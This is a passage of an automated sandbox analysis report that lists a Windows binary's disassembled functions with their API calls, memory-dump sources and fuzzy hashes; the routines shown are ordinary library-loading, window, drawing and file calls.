                                                                          • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                                          • SetCursor.USER32(00000000), ref: 0042340B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                          • String ID:
                                                                          • API String ID: 1770779139-0
                                                                          • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                          • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                                          • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                          • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                                          Function 00494838 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                          • API String ID: 667068680-2254406584
                                                                          • Opcode ID: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                                          • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                                          • Opcode Fuzzy Hash: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                                          • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                                          Function 0045D4A8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                          • API String ID: 190572456-212574377
                                                                          • Opcode ID: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                                          • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                                          • Opcode Fuzzy Hash: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                                          • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                                          Function 0042EA14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                                          • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                                            • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                            • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                            • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                          • API String ID: 142928637-2676053874
                                                                          • Opcode ID: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                                          • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                                          • Opcode Fuzzy Hash: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                                          • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                                          Function 0044C7D4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                          • API String ID: 2238633743-1050967733
                                                                          • Opcode ID: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                                          • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                                          • Opcode Fuzzy Hash: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                                          • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                                          Function 004786B4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                          • API String ID: 667068680-222143506
                                                                          • Opcode ID: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                                          • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                                          • Opcode Fuzzy Hash: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                                          • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
                                                                          Function 0041B664 Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B73D
                                                                          • 73A1A570.USER32(?), ref: 0041B749
                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A26310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3906783838-0
                                                                          • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                          • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                                          • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                          • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                                          Function 0041B934 Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041BA0F
                                                                          • 73A1A570.USER32(?), ref: 0041BA1B
                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A26310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3906783838-0
                                                                          • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                          • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                                          • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                          • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                                          Function 0041B500 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B576
                                                                          • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                                          • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                                          • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: E680$A24620A480A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3709697839-0
                                                                          • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                          • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                                          • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                          • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                                          Function 0045CE6C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                          • API String ID: 1452528299-1580325520
                                                                          • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                          • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                                          • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                          • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                                          Function 0041BD84 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                                          • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                                          • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                                          • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                                          • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A24620MetricsSystem$A480A570
                                                                          • String ID:
                                                                          • API String ID: 4042297458-0
                                                                          • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                          • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                                          • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                          • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                                          Function 0047DDA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID:
                                                                          • API String ID: 3609083571-0
                                                                          • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                          • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                                          • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                          • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                                          Function 0041B268 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                          • String ID:
                                                                          • API String ID: 3527656728-0
                                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                                          Function 00453890 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: -cI$.tmp$_iu
                                                                          • API String ID: 3498533004-3964432171
                                                                          • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                          • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                                          • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                          • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                                          Function 00497268 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
